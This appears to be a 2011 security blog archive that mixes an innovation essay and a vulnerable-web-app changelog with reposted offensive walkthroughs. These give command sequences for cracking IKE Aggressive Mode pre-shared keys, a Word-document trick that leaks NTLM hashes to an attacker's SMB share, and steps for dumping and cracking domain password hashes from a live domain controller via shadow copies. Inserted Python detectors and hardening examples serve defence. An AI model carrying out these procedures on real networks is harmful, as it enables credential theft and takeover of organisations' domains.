Friday, December 9, 2011

Use Jugaad to Innovate Faster, Cheaper, Better

This is not a techie post, but I just loved what the post author had to say. A grand shout out to Jugaad innovators.

We recently attended the World Economic Forum's India Economic Summit 2011 in Mumbai, where we moderated several panels and workshops on the topic of innovation. The experience gave us some insights into a unique approach to innovation called jugaad, which entrepreneurs and enterprises are practicing in complex emerging markets like India.

Jugaad is a Hindi word that loosely translates as "the gutsy art of overcoming harsh constraints by improvising an effective solution using limited resources." Jugaad is an antidote to the complexity of India: a country of mind-boggling diversity; pervasive scarcity of all kinds; and exploding interconnectivity (India is adding 10 million cellphone subscribers every month).

This highly resource-constrained and chaotic environment inspires jugaad innovators — i.e., the Indian entrepreneurs and corporations who practice jugaad to develop market-relevant products and services that are inherently affordable and sustainable. Jugaad innovators are modern-day alchemists who transmute adversity into opportunity, and in so doing create value for their organizations and communities. And while we first learned about jugaad while conducting field research in India over the past several years, we've found that jugaad innovators exist around the world, including right here in the U.S.

There are three aspects of jugaad that make it particularly effective. Specifically:

Jugaad innovators innovate faster: Jugaad innovators don't use linear, pre-planned, time-consuming R&D processes. Rather, they rely heavily on rapid prototyping techniques — i.e., they collaborate intimately with customers and use their constant feedback to zero in on the most relevant product features. For instance, Jane Chen and Rahul Panicker, Stanford graduates and co-founders of Embrace, worked closely with village pediatricians and patients in rural India to iteratively optimize the design of their breakthrough portable infant warmer — which costs less than 5% of incubators sold in the West (which are typically priced around $20,000).

Jugaad innovators innovate cheaper: Jugaad innovators are very frugal. Rather than reinventing the wheel or splurging on expensive R&D projects, they develop new solutions by building upon existing infrastructure and assets, as well as by recombining existing solutions. In doing so, they can pass the cost savings on to their customers. For instance, YES Bank, one of India's leading private banks, has deployed a mobile payment solution that enables money transfer via cellphones without the need for a bank account. This solution piggybacks on India's existing robust mobile telephony infrastructure that extends to the remotest of villages in India (a country where nearly 870 million people have cellphones, but 600 million or so do not have a bank account).

Jugaad innovators innovate better: Jugaad innovators recognize that consumers in emerging markets are low earners, but high yearners. As such, jugaad innovators attempt to meet customers' high aspirations by developing solutions that are not only affordable, but that also deliver superior value. In sum, they strive to deliver more (value) for less (cost). Take, for instance, SELCO, an Indian renewable energy firm founded by the U.S.-educated Harish Hande. Recognizing the diverse needs of the Indian rural population, SELCO set out to personalize the value proposition of its solar lanterns to individual customers — be they a village midwife who doesn't want the toxic fumes of a kerosene lamp polluting her patient's environment; a rosebud collector looking for a modular lighting solution that can be repaired quickly in a remote location; or a vegetable seller who doesn't want to contend with the electrical outages that are typical across India. As a result, more than 115,000 rural customers now use SELCO's solar lanterns — not only because they are affordable, but because they deliver superior value by addressing customers' unique needs.

What makes jugaad innovators so adept at innovating faster, cheaper, and better? The answer lies in their unique mindset — characterized by two key attributes: adaptability and inclusivity.

Jugaad innovators are highly adaptable: Indian entrepreneurs who practice jugaad are a resilient bunch: they continually find ways to bounce back from the adversity that permeates every aspect of their lives. Jugaad innovators sense and respond to rapid changes in their environment by dynamically reinventing their business models. For instance, Chen and Panicker, co-founders of Embrace, initially set out to design a fixed incubator at a low-cost — but once they discovered that Indian village women preferred to hold their newborn babies close to their bodies, they quickly adapted their business model around a portable infant warmer.

Jugaad innovators are inclusive: In India, more than 800 million citizens lack access to healthcare, 600 million are unbanked, and 400 million live off the electricity grid. While most corporations view these marginal segments as being unprofitable, jugaad innovators like YES Bank's Rana Kapoor and SELCO's Harish Hande have invented inclusive business models for profitably serving the millions who live on the margins of society. For these entrepreneurs, including the margin not only provides for greater social good, it also makes great business sense.

Interestingly, we have noticed that jugaad is practiced not only by Indian entrepreneurs and corporations, but also by some pioneering multinationals in India. Take GE Healthcare, for instance, which used the flexible jugaad mindset to make high-quality cancer diagnosis and treatment accessible to underdeveloped communities across India. Until recently, India had been importing the radioisotopes required for nuclear imaging such as PET/CT scans. This was not only unaffordable for many rural hospitals, it was ineffective because the radioisotopes decay over time (in hours or even minutes), so they need to be administered to the patient soon after they're produced. GE Healthcare partnered with private diagnostic centers and airline companies to locally produce radioisotopes — and make deliveries on a just-in-time basis to small-town hospitals around the country. Now, with GE Healthcare's frugal "pay-per-use" pricing model and just-in-time delivery mechanism, the supply of radioisotopes has become affordable and dependable for many rural hospitals.

The jugaad mindset — and its associated principles and practices — is increasingly relevant for companies worldwide who are seeking to grow in an increasingly complex and resource-constrained business environment. Unlike traditional, structured innovation methods that rely on time-consuming and expensive R&D processes, the more fluid jugaad approach delivers speed, agility, and cost efficiencies. Jugaad is a "bottom up" innovation approach that provides organizations in both emerging and developed economies the key capabilities they need to succeed in a hypercompetitive and fast-moving world: frugality, inclusivity, collaboration, and adaptability.

Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

Carnal0wnage blog has this nice article about hacking into IPsec tunnels in aggressive mode.

There hasn't been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what I'm talking about, go read this: and

In IKE Aggressive Mode the authentication hash based on a pre-shared key (PSK) is transmitted as the response to the initial packet of a VPN client that wants to establish an IPsec tunnel (HASH_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump, and start a dictionary or brute-force attack against this hash to recover the PSK.

This attack only works in IKE Aggressive Mode because in IKE Main Mode the hash is already encrypted. Based on such facts, IKE Aggressive Mode is not very secure.

It looks like this:
$ sudo ike-scan
Starting ike-scan 1.9 with 1 hosts ( Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A
Starting ike-scan 1.9 with 1 hosts ( Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value= Nonce(20 bytes) Hash(16 bytes)
To save with some output:
$ sudo ike-scan -A --id=myid -P192-168-207-134key
Once you have your PSK file to crack, you're stuck with two options: psk-crack and Cain.

psk-crack is fairly rudimentary.

to brute force:

$ psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
The default charset is "0123456789abcdefghijklmnopqrstuvwxyz" and can be changed with --charset=
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking mode
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
To dictionary attack:

$ psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
You may find yourself wanting a bit more flexibility or options during brute-forcing or dictionary attacking (i.e. character substitution). For this you'll need to use Cain. The problem I ran into was that Cain is a Windows tool and ike-scan is *nix. I couldn't get the Windows tool that is floating around to work. in VMware and have Cain sniff on your VMware interface. The PSK should show up in the passwords of the sniffer tab, then you can select and "send to cracker". It's slow as hell, but has more options than psk-crack.
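To make the Main Mode / Aggressive Mode distinction above concrete from the monitoring side, here is an added example of my own (not code from the Carnal0wnage post or from the ike-scan project). It parses the fixed ISAKMP header and the generic payload chain of an IKEv1 message and reports whether a HASH payload travels unencrypted inside an Aggressive Mode exchange, which is exactly the condition that makes the PSK hash capturable. The three messages it inspects are constructed in the block with dummy payload bodies and fixed cookies, not real captures; the same parser can be pointed at UDP/500 datagrams pulled from a pcap to inventory VPN endpoints that answer in Aggressive Mode.

```python
import struct

# ISAKMP (IKEv1) exchange types, RFC 2408 section 3.1
EXCHANGE_TYPES = {1: "Base", 2: "Identity Protection (Main Mode)",
                  3: "Authentication Only", 4: "Aggressive",
                  5: "Informational", 32: "Quick Mode"}
# ISAKMP payload types, RFC 2408 section 3.1
PAYLOAD_TYPES = {1: "SA", 2: "Proposal", 3: "Transform", 4: "KE", 5: "ID",
                 6: "CERT", 7: "CR", 8: "HASH", 9: "SIG", 10: "NONCE",
                 11: "NOTIFY", 12: "DELETE", 13: "VID"}
NAME_TO_TYPE = {v: k for k, v in PAYLOAD_TYPES.items()}
# I-cookie, R-cookie, next payload, version, exchange type, flags, message ID, length
HEADER_FMT = "!8s8sBBBBII"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 28 bytes
FLAG_ENCRYPTION = 0x01

def parse_isakmp(data):
    """Parse the fixed header and walk the generic payload chain (RFC 2408 section 3)."""
    if len(data) < HEADER_LEN:
        raise ValueError("truncated ISAKMP header")
    (icookie, rcookie, next_payload, version, exch_type,
     flags, _msg_id, length) = struct.unpack(HEADER_FMT, data[:HEADER_LEN])
    if length != len(data):
        raise ValueError("ISAKMP length field does not match datagram length")
    encrypted = bool(flags & FLAG_ENCRYPTION)
    payloads, offset, current = [], HEADER_LEN, next_payload
    # With the E bit set everything after the header is ciphertext, so the
    # chain can only be walked on unencrypted messages.
    while not encrypted and current != 0:
        if offset + 4 > len(data):
            raise ValueError("truncated payload header")
        nxt, _reserved, plen = struct.unpack("!BBH", data[offset:offset + 4])
        if plen < 4 or offset + plen > len(data):
            raise ValueError("bad payload length")
        payloads.append(PAYLOAD_TYPES.get(current, "UNKNOWN(%d)" % current))
        offset, current = offset + plen, nxt
    return {"initiator_cookie": icookie.hex(), "responder_cookie": rcookie.hex(),
            "version": "%d.%d" % (version >> 4, version & 0x0F),
            "exchange_type": exch_type,
            "exchange": EXCHANGE_TYPES.get(exch_type, "UNKNOWN(%d)" % exch_type),
            "encrypted": encrypted, "payloads": payloads}

def assess(data):
    """Parsed message plus a verdict: is a PSK-derived hash visible in cleartext?"""
    msg = parse_isakmp(data)
    # The responder's Aggressive Mode reply carries HASH_R before any encryption is
    # negotiated; in Main Mode the ID/HASH exchange only ever travels with the E bit set.
    msg["psk_hash_exposed"] = (msg["exchange_type"] == 4 and not msg["encrypted"]
                               and "HASH" in msg["payloads"])
    return msg

def build_message(exch_type, payload_names, flags=0, body_len=8):
    """Constructed sample message (not a capture): dummy payload bodies of body_len bytes."""
    body = b""
    for i, name in enumerate(payload_names):
        nxt = NAME_TO_TYPE[payload_names[i + 1]] if i + 1 < len(payload_names) else 0
        body += struct.pack("!BBH", nxt, 0, 4 + body_len) + b"\x00" * body_len
    first = NAME_TO_TYPE[payload_names[0]] if payload_names else 0
    header = struct.pack(HEADER_FMT, b"\x11" * 8, b"\x22" * 8, first, 0x10,
                         exch_type, flags, 0, HEADER_LEN + len(body))
    return header + body

# Constructed samples: a Main Mode SA reply, an Aggressive Mode responder reply,
# and a Main Mode message of the ID/HASH shape, which is always encrypted.
MAIN_MODE_REPLY = build_message(2, ["SA", "VID"])
AGGRESSIVE_REPLY = build_message(4, ["SA", "KE", "NONCE", "ID", "HASH", "VID"])
MAIN_MODE_ENCRYPTED = build_message(2, ["ID", "HASH"], flags=FLAG_ENCRYPTION)

if __name__ == "__main__":
    for label, pkt in [("main", MAIN_MODE_REPLY), ("aggressive", AGGRESSIVE_REPLY),
                       ("main-encrypted", MAIN_MODE_ENCRYPTED)]:
        r = assess(pkt)
        print(label, r["exchange"], r["payloads"],
              "PSK hash exposed" if r["psk_hash_exposed"] else "ok")
```

The verdict is deliberately narrow: an Aggressive Mode exchange with no visible HASH (for example the initiator's first message) is reported but not flagged, and an encrypted message yields an empty payload list rather than a guess. On a real network the fix is configuration, not detection: disable Aggressive Mode on the responder, or move from PSK to certificate authentication.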

Thursday, December 1, 2011

XSSer v.1.6 BETA Released

Cross Site "Scripter" is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters, and various special techniques of code injection.


Core:
Added Drop Cookie option
Added Random IP X-Forwarded-For and X-Client-IP option
Added GSS and NTLM authentication methods
Added Ignore proxy option
Added TCP-NODELAY option
Added Follow redirects option
Added Follow redirects limiter parameter
Added Auto-HEAD precheck system
Added No-HEAD option
Added Isalive option
Added Check at url option (Blind XSS)
Added Reverse Check parameter
Added PHPIDS (v.0.6.5) exploit
Added More vectors to auto-payloading
Added HTML5 studied vectors
Fixed Different bugs on core
Fixed Curl handler options
Fixed Dorkerers system
Fixed Bugs on results propagation
Fixed POST requests

GTK:
Added New features to GTK controller
Added Detailed views to GTK interface


Wednesday, November 30, 2011

Embedding A Link To A Network Share In A Word Doc

Taken from Carnal0wnage blog, this is an excellent method to embed network share in a word document.

snip snip .......

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up adding the following code to the office document (replace "[" and "]" with "<" and ">"):

[html][body][img src="\\\share\pwn.jpeg"
width=1 height=1][/body][/html]
Once that is done go to Insert --> Object --> Text from File --> select your HTML file

Once that is done, save and open the document. If all is well you'll see the SMB requests to the network share you specified, and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods... I do realize the LM hashes are missing from the smb capture screenie (disabled on Windows 7?) but I was too lazy to install Office on a VM just for the screenshot.

If this doesn't work for anyone let me know.
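From the defender's side, the thing to catch is an inbound document whose markup makes Word fetch a resource over SMB, as the post's tiny image does. The following is an added example of mine (not code from the Carnal0wnage post) that scans an HTML fragment of the kind pasted into a document via Insert --> Object --> Text from File and reports any src/href/data attribute pointing at a UNC path or a file:// URL, noting when the reference is a 1x1 image. The two fragments, the host name fileserver.example and the share name are constructed for the example.

```python
import re
from html.parser import HTMLParser

# A UNC path (\\server\share\...) or a file:// URL: rendering either makes the
# viewer open an SMB session to "server", which is what leaks the NTLM exchange.
UNC_RE = re.compile(r"^(?:\\\\|file://)", re.IGNORECASE)

class ExternalRefScanner(HTMLParser):
    """Collects attributes whose value would be fetched from an SMB share on render."""
    WATCHED = {("img", "src"), ("a", "href"), ("link", "href"), ("script", "src"),
               ("iframe", "src"), ("frame", "src"), ("object", "data"), ("embed", "src")}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # html.parser lower-cases attribute names for us
        for name in ("src", "href", "data"):
            value = attrs.get(name)
            if (tag, name) in self.WATCHED and value and UNC_RE.match(value.strip()):
                self.findings.append({
                    "line": self.getpos()[0], "tag": tag, "attr": name,
                    "target": value.strip(),
                    # a 1x1 image is the shape used to keep the fetch invisible to the reader
                    "hidden": attrs.get("width") == "1" and attrs.get("height") == "1",
                })

def scan_html(fragment):
    """Return the list of findings for one HTML fragment (empty when it is clean)."""
    scanner = ExternalRefScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings

# Constructed samples; fileserver.example is a placeholder host name, not a real server.
UNC_FRAGMENT = r'<html><body><img src="\\fileserver.example\share\pwn.jpeg" width=1 height=1></body></html>'
BENIGN_FRAGMENT = '<html><body><img src="https://www.example.com/logo.png" width="200"></body></html>'

if __name__ == "__main__":
    for label, frag in [("unc", UNC_FRAGMENT), ("benign", BENIGN_FRAGMENT)]:
        print(label, scan_html(frag))
```

The scanner only sees HTML, so in a mail gateway it belongs behind a step that unpacks .docx/.xml parts or exports the document body as HTML first. The structural mitigation is separate from detection: block outbound SMB (TCP 445 and 139) at the perimeter so that a document opened inside the network cannot complete an NTLM exchange with an external host.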

Session Hijacking - SSL Session Sidejacking (SSLStrip, Hamster, Ferret)

Mutillidae 2.1.7 Deliberately Vulnerable Web App Updated (a lot)

Jeremy Druin has been doing a lot of work on Mutillidae. Here is the change log since the last time I mentioned it:

Change Log for Mutillidae 2.1.7:

Added a new page for HTML5 storage. The page is meant to show how to both use and attack HTML5 storage. The page supports Local and Session storage types. The user can attack the storage in two contexts. They can act as if they want to read the contents of their own browser's session storage to see if the developer put authorization tokens or other items into the storage. They can also try to use XSS to steal the session storage. In this use-case the user would be acting as if they wanted to read someone else's storage. A large number of hints have been added to the page. The page name is "html5-storage.php" and it can be accessed from the Cross Site Scripting menu and the Information Leakage menu. In security level zero, the page has no defenses. In level 1, the page will use trivial JavaScript validation. In security level 5, the page will refuse to put the secrets in client side storage.

11/13/2011: Jeremy Druin / Kenny Kurtz

Change Log for Mutillidae 2.1.6:

Enhanced the .htaccess file to automatically disable magic quotes on systems which enable them by default (such as some OSX versions of PHP)
Fixed some bugs in the phpinfo.php file that made the page display weird.
Enhanced the hidden PHPINFO page so that it would work if the user browsed to http://localhost/mutillidae/index.php?page=phpinfo.php or to http://localhost/mutillidae/phpinfo.php. This example assumes Mutillidae is running on localhost.
Fixed a bug in index.php that kept the log-visit page from being included.
Fixed a bug in log-visit.php that kept the page from working.
Fixed installation instructions format for IE 8 not in compatibility mode.

11/10/2011: Jeremy Druin

Change Log for Mutillidae 2.1.5:

Added vuln to login sequence. Now a cookie is created with username. Students should try to XSS the cookie and see what happens. Also try a response splitting attack because a cookie is an HTTP header.
Created new twitter feed to make Mutillidae announcements and other web vulnerability tweaks. @webpwnized
Fixed installation instructions format for IE 8 not in compatibility mode

10/14/2011: Jeremy Druin

Change Log for Mutillidae 2.1.4:

Moved usage instructions and php errors from the home page to their own pages.
In insecure mode, changed the method of the user-info.php page to GET in order to make it easier to use sqlmap against Mutillidae. sqlmap supports POST but it is easier to use with GET.
Added hints about sqlmap to sql injection tutorial and to the easter egg file
Added a credit card table as a target in the database
Confirmed that the view-blog table can be attacked with sqlmap. The answer is in the Easter Egg file.

10/13/2011: Jeremy Druin

Change Log for Mutillidae 2.1.3:

Fixed a bug. If the user was on the home page without having clicked any link to this point (such as when using a bookmark), and then clicked "change security level", the page would redirect to page not found.
Increased the slide time for the ddsmoothmenu to make it slow down a little bit
Added a NEW vulnerability. Many sites have crazy pages that show server settings, expose admin functionality, allow configuration, or other features a user should not be able to see. The problem is not the pages themselves so much as the fact that developers think no one will guess the name and browse to them. Shoulder surfing, guessing, brute-forcing, etc can be used to find these pages. Mutillidae now has such a page. It is in the "Server Misconfiguration" category. See secret-administrative-pages.php for hints.
Augmented the installation instructions
Added link to ihackcharities to front page
Added a new security level. Now there is security level 1. The only difference in this release between level 0 and level 1 is that level 1 has JS validation. The JS validation has been in place for a while to allow but was activated in level 0. Since level 0 is supposed to be very easy, the decision was made to create level 1 and move JS validation to level 1. The JS validation is trivial to bypass. Simply disable JS or use a proxy such as Tamper Data, Paros, Burp, WebScarab, or others.
Page homenotes.php has been merged with home.php.
Page home.html has been renamed home.php
Added protection for SQL injection to the add-to-your-blog.php output of the current user's blog entries. Prior to this patch, you could SQL inject in security level 5 by putting your injection in the current user's login name, because the query uses the current user's login name as the input to the query.
Improved the DNS lookup page to add JS validation in security level 1 mode.
Changed padding for BACK button to use styles rather than HTML BR tags.
Changed the password generator password length to 15 to set a better example.
Some refactoring on user-info.php and login.php to clean up code
Added CSRF Protection to page add to your blog. This only works in secure mode.
Added more scripts to the easter egg file (Mutillidae Test Scripts)
Bug fix: The setupandreset.php errors were not printing out.
Stupid bug fix: Removed the "open DB" that was firing before the database was actually created.
Created output on page setupandreset.php to show what happened
Added try/catch and more error handling to setupandreset.php
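The 2.1.5 item above (a cookie is created from the username; students are told to try a response splitting attack because a cookie is an HTTP header) in code: an added illustration of mine in Python, not Mutillidae's PHP, contrasting a Set-Cookie line built straight from the username with one that rejects control characters and percent-encodes the value before it is emitted. The raw-header splitter stands in for a naive client, and the hostile username is constructed for the example.

```python
from urllib.parse import quote

# Constructed hostile username: the embedded CRLF terminates the Set-Cookie line
# early and lets the rest of the value masquerade as a second header.
HOSTILE_USERNAME = "alice\r\nSet-Cookie: isadmin=1"

def set_cookie_insecure(name, value):
    """Security level 0 style: the value is dropped straight into the header line."""
    return "Set-Cookie: %s=%s" % (name, value)

def set_cookie_hardened(name, value):
    """Refuse control characters, then percent-encode so only cookie-octets remain.
    RFC 6265 excludes CTLs, whitespace, DQUOTE, comma, semicolon and backslash from
    cookie values; quote(..., safe="") encodes all of those and also neutralises
    '<' and '>' for the XSS exercise on the same page."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in cookie value")
    return "Set-Cookie: %s=%s; HttpOnly; SameSite=Strict" % (name, quote(value, safe=""))

def header_names(raw_block):
    """A naive client's view of a header block: every CRLF-delimited line is one header."""
    return [line.split(":", 1)[0] for line in raw_block.split("\r\n") if line]

def describe(name, value):
    """Summarise how each builder handles one username."""
    insecure = header_names(set_cookie_insecure(name, value))
    try:
        hardened, rejected = header_names(set_cookie_hardened(name, value)), False
    except ValueError:
        hardened, rejected = [], True
    return {"insecure_headers": insecure, "hardened_headers": hardened, "rejected": rejected}

if __name__ == "__main__":
    print(describe("username", HOSTILE_USERNAME))
    print(set_cookie_hardened("username", "<script>alert(1)</script>"))
```

Rejecting rather than silently stripping is deliberate: a username that arrives with a CR or LF in it is not a formatting accident, and a logged ValueError is the signal a detection engineer wants. The HttpOnly flag is there because the other exercise on the page is reading the cookie from script; it does not remove the need to keep the value out of the header grammar.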

Wednesday, November 23, 2011

Top 10 iPhone Security Tips

This paper offers guidelines on securing your iPhone using features provided by iOS and by following other security best practices. It begins by discussing basic security settings for novice users and then continues to discuss advanced techniques for expert users. This paper is intended for users who want to take proactive measures to secure their iPhones, companies willing to train their employees (before allowing corporate emails on the devices), and administrators working on developing strong policies. It confines its discussion to iPhone security features only and does not discuss similar features that may be available in other mobile device platforms such as Android. However, some of the concepts and standards apply across all these devices.

Download PDF here.

Tuesday, November 22, 2011

Dumping hashes from live DCs...

Lanmaster presented VSSOwn at Hack3rCon and, picking up from that rubble, pushed this technique further to dump hashes off a live DC. The actual blog entry from PaulDotCom is here. It goes like this:

The basis of the talk and the purpose for Mark's research is that there are some really cool things you can do with Volume Shadow Copies in modern Windows Operating Systems. Our talk takes the approach of using Shadow Copies for hiding malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.

The day after we first presented "Lurking in the Shadows" at Hack3rCon II, Matt Graeber (@mattifestation) reached out to me and asked if I'd ever tried to take the SAM, SYSTEM hive or NTDS.DIT files from a live system using this technique. At the time, I hadn't. So, I immediately fired up my Windows 7 box, created a Shadow Copy with VSSOwn, and attempted to copy the SAM and SYSTEM hive files directly from the Shadow Copy. To my surprise, the 2 files copied without any non-readable errors! I guess I knew it would be possible, as Mark and I were already beating around this bush, but this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.

So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.

But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the hashes. But during my quest to find something, Jeremy Pommerening tweeted a link to this white paper. In brief, a security researcher named Csaba Barta took some existing tools and modified them to parse through the NTDS.DIT file and extract the hashes from it. Awesome! The link is complete! I combined Mark's and my technique with Csaba's tools and here is the result:

1. Create a new Shadow Copy.
cscript vssown.vbs /start (optional)
cscript vssown.vbs /create

2. Pull the following files from a shadow copy:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

3. Copy files to BT5R1.

4. Download tools from:

5. Configure and make the source code for libesedb from the extracted package.
cd libesedb
chmod +x configure
./configure && make

6. Use esedbdumphash to extract the datatable from ntds.dit.
cd esedbtools
./esedbdumphash ../../ntds.dit

7a. Use to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
cd ../../creddump/
python ./ ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

7b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
bkhive SYSTEM key.txt
samdump2 SAM key.txt

8. Crack the hashes.

Beautiful right? But we're not done yet. Csaba also created a tool called which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.

python ./ ../system ../libesedb/esedbtools/ntds.dit.export/datatable

So what exactly does this mean? No more dangerous LSASS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper, Matt Graeber for the idea (and everything else it seems like recently), and dakykilla for providing the files I needed to test all this stuff. You guys rock!
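The same sequence, seen from the detection side: the two observable steps are the creation of a shadow copy and a copy of ntds.dit, SYSTEM or SAM out of a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy path, both of which show up in process command lines. Below is an added example of my own (not part of the PaulDotCom post or of VSSOwn) that runs those two checks over process-creation records and raises one alert per host, rating it higher when the creation and the read happen on the same host. The pipe-delimited log format, host names, user names and timestamps are invented for the example; a Security 4688 or Sysmon event 1 feed carries the same fields.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "ts host user image cmdline")

# Constructed process-creation records (timestamp|host|user|image|command line).
# Hosts, users and times are invented; the command lines mirror the steps in the post.
SAMPLE_LOG = r"""
2011-11-20T10:02:11Z|DC01|CORP\svc_backup|C:\Windows\System32\cscript.exe|cscript vssown.vbs /create
2011-11-20T10:02:40Z|DC01|CORP\svc_backup|C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit .
2011-11-20T10:02:45Z|DC01|CORP\svc_backup|C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM .
2011-11-20T11:15:00Z|FS02|CORP\admin|C:\Windows\System32\vssadmin.exe|vssadmin list shadows
2011-11-20T11:16:00Z|FS02|CORP\admin|C:\Windows\System32\cmd.exe|copy D:\reports\q3.xlsx E:\archive\q3.xlsx
"""

# Shadow copy creation via the VSSOwn script from the post or the built-in vssadmin.
CREATE_RE = re.compile(r"vssown\.vbs\s+/create|vssadmin(?:\.exe)?\s+create\s+shadow", re.I)
# A path inside a shadow copy device that ends in one of the files the post copies out.
READ_RE = re.compile(
    r"HarddiskVolumeShadowCopy\d+\\.*?\\(?:ntds\.dit|config\\(?:system|sam))\b", re.I)

def parse_line(line):
    """Split one constructed record into its five fields (command line may contain '|')."""
    ts, host, user, image, cmdline = line.split("|", 4)
    return Event(ts, host, user, image, cmdline)

def detect(log_text):
    """Return one alert per host that copied a protected file out of a shadow copy."""
    state = {}
    for line in log_text.strip().splitlines():
        ev = parse_line(line)
        s = state.setdefault(ev.host, {"created": False, "files": [], "users": set(),
                                       "first": None, "last": None})
        created = CREATE_RE.search(ev.cmdline) is not None
        read = READ_RE.search(ev.cmdline)
        if created:
            s["created"] = True
        if read:
            # group(0) ends at the file name, so the last path component is the file
            s["files"].append(read.group(0).rsplit("\\", 1)[-1])
        if created or read:
            s["users"].add(ev.user)
            s["first"] = s["first"] or ev.ts
            s["last"] = ev.ts
    alerts = []
    for host, s in state.items():
        if not s["files"]:
            continue  # creating or listing shadow copies alone is routine admin work
        alerts.append({"host": host,
                       "severity": "critical" if s["created"] else "high",
                       "files": s["files"], "users": sorted(s["users"]),
                       "window": (s["first"], s["last"])})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Listing shadow copies or creating one on a file server is normal backup behaviour, which is why only the read of a credential store inside the shadow copy device path raises an alert and the creation merely escalates it. The rule keys on the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy prefix rather than on a particular tool, so it is indifferent to whether copy, xcopy or a script does the reading.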

Hackers attack a US water utility

Hackers destroyed a pump used by a US water utility after gaining unauthorized access to the industrial control system it used to operate its machinery. Five computer screenshots posted early Friday purport to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas.

''This is arguably the first case where we have had a hack of critical infrastructure from outside the United States that caused damage,'' a managing partner at Applied Control Solutions, Joseph Weiss, said.

The network breach was exposed after cyber intruders burned out a pump. ''No one realised the hackers were in there until they started turning on and off the pump,'' he said.

It said hackers apparently broke into a software company's database and retrieved usernames and passwords of various control systems that run water plant computer equipment. Using that data, they were able to hack into the Illinois plant.

The U.S. Department of Homeland Security and the Federal Bureau of Investigation are examining the matter, said DHS spokesman Peter Boogaard.

"At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety," he said, declining to elaborate further. An FBI spokesman in Illinois did not return phone calls seeking comment.

Is it hard to crack full Disk Encryption For Law Enforcement ?

If you'd rather keep your data private, take heart: disk encryption is a lot harder to break than techno-thriller movies and TV shows make it out to be, to the chagrin of some branches of law enforcement. MrSeb writes with word of a paper titled "The growing impact of full disk encryption on digital forensics" that illustrates just how difficult it is. According to the paper, co-authored by a member of US-CERT:

The abstract of the paper is available here, and a short summary is given below:
